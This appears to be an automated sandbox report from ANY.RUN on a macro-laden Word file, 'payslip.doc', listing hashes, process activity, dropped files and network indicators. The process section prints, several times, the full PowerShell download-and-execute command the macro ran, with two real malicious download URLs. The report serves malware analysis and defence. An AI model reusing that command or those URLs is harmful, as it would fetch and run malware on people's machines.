analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

payslip.doc

Full analysis: https://app.any.run/tasks/d34f6879-a663-4c1b-9904-ccfeefa684d8
Verdict: Malicious activity
Analysis date: November 15, 2018, 18:01:58
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1251, Author: Enpor Support, Template: Normal, Last Saved By: user, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Thu Nov 15 13:11:00 2018, Last Saved Time/Date: Thu Nov 15 13:12:00 2018, Number of Pages: 1, Number of Words: 18, Number of Characters: 108, Security: 0
MD5:

6715F77143D45CD1286D1B7A0AD9BEF7

SHA1:

183AA33BE25EA44B4E29757A45846EFA64A6CD91

SHA256:

2CBB0ED6FF901B6B54B497AC6540ABBC32E9365D59EC95FD37B700BC8FD28946

SSDEEP:

384:sEt1XesnEGlGeB50+0ky0NGoGFRP9K/rVXDcxcQ1yGcS2rdy5ujtMImCeX0jOR4Q:s1sCCr2yrTqISdDANspkKrag2VpE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2792)
      • cmd.exe (PID: 2572)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3004)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3004)
  • SUSPICIOUS

    • Reads the machine GUID from the registry

      • powershell.exe (PID: 2676)
      • powershell.exe (PID: 2504)
    • Creates files in the user directory

      • powershell.exe (PID: 2676)
      • powershell.exe (PID: 2504)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2676)
  • INFO

    • Reads the machine GUID from the registry

      • WINWORD.EXE (PID: 3004)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3004)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3004)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2504)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

CompObjUserType: Microsoft Office Word 97-2003 Document
CompObjUserTypeLen: 39
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
CharCountWithSpaces: 125
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Cyrillic
Security: None
Characters: 108
Words: 18
Pages: 1
ModifyDate: 2018:11:15 13:12:00
CreateDate: 2018:11:15 13:11:00
TotalEditTime: 1.0 minutes
Software: Microsoft Office Word
RevisionNumber: 3
LastModifiedBy: user
Template: Normal
Comments: -
Keywords: -
Author: Enpor Support
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs mobsync.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3004"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\payslip.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.5123.5000
2472C:\Windows\System32\mobsync.exe -EmbeddingC:\Windows\System32\mobsync.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Sync Center
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2792cmd /c powershell "'powershell ""<#wait done#>function waitdone([string] $spath){(new-object system.net.webclient).downloadfile($spath,''%tmp%\tmp802.exe'');<#last info#>start-process ''%tmp%\tmp802.exe'';}try{waitdone(''http://movingmountainsfoods.com/huer.buer'')}catch{waitdone(''http://bomanforklift.com/huer.buer'')}'"" | out-file -encoding ascii -filepath %tmp%\tmp343.bat; start-process '%tmp%\tmp343.bat' -windowstyle hidden"C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2676powershell "'powershell ""<#wait done#>function waitdone([string] $spath){(new-object system.net.webclient).downloadfile($spath,''C:\Users\admin\AppData\Local\Temp\tmp802.exe'');<#last info#>start-process ''C:\Users\admin\AppData\Local\Temp\tmp802.exe'';}try{waitdone(''http://movingmountainsfoods.com/huer.buer'')}catch{waitdone(''http://bomanforklift.com/huer.buer'')}'"" | out-file -encoding ascii -filepath C:\Users\admin\AppData\Local\Temp\tmp343.bat; start-process 'C:\Users\admin\AppData\Local\Temp\tmp343.bat' -windowstyle hidden"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2572C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\tmp343.bat" "C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2504powershell "<#wait done#>function waitdone([string] $spath){(new-object system.net.webclient).downloadfile($spath,'C:\Users\admin\AppData\Local\Temp\tmp802.exe');<#last info#>start-process 'C:\Users\admin\AppData\Local\Temp\tmp802.exe';}try{waitdone('http://movingmountainsfoods.com/huer.buer')}catch{waitdone('http://bomanforklift.com/huer.buer')}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 242
Read events
1 616
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
5
Text files
3
Unknown types
4

Dropped files

PID
Process
Filename
Type
3004WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRF6A2.tmp.cvr
MD5:
SHA256:
3004WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF8A7F7CF4FDF44B30.TMP
MD5:
SHA256:
3004WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF71D1C31F1F8960F6.TMP
MD5:
SHA256:
3004WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF9856140E6EE05845.TMP
MD5:
SHA256:
2676powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5RFMTUZQ3H9HCZQB1M5I.temp
MD5:
SHA256:
2504powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H0K0X95I1KL782WBTHAY.temp
MD5:
SHA256:
3004WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:C3AC515698D2F5E219905A0A46065CC6
SHA256:CE86AD28B0F4C8125F38AE1DF50B3122FE28545C85DF362907273C0AEAF8773B
2504powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:C0270B8342CC14811182BE51EBF722BF
SHA256:9825FE5001B4DB00CE05702ABD8775CBC65B0B359B4B8435738BA933B007626B
2676powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF1206af.TMPbinary
MD5:C0270B8342CC14811182BE51EBF722BF
SHA256:9825FE5001B4DB00CE05702ABD8775CBC65B0B359B4B8435738BA933B007626B
2676powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:C0270B8342CC14811182BE51EBF722BF
SHA256:9825FE5001B4DB00CE05702ABD8775CBC65B0B359B4B8435738BA933B007626B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2504
powershell.exe
GET
301
213.129.84.120:80
http://movingmountainsfoods.com/huer.buer
GB
html
250 b
malicious
2504
powershell.exe
GET
404
67.225.140.210:80
http://bomanforklift.com/huer.buer
US
html
326 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2504
powershell.exe
213.129.84.120:443
movingmountainsfoods.com
The Bunker Secure Hosting Ltd
GB
suspicious
2504
powershell.exe
213.129.84.120:80
movingmountainsfoods.com
The Bunker Secure Hosting Ltd
GB
suspicious
2504
powershell.exe
67.225.140.210:80
bomanforklift.com
Liquid Web, L.L.C
US
malicious

DNS requests

Domain
IP
Reputation
movingmountainsfoods.com
  • 213.129.84.120
malicious
bomanforklift.com
  • 67.225.140.210
malicious

Threats

No threats detected
No debug info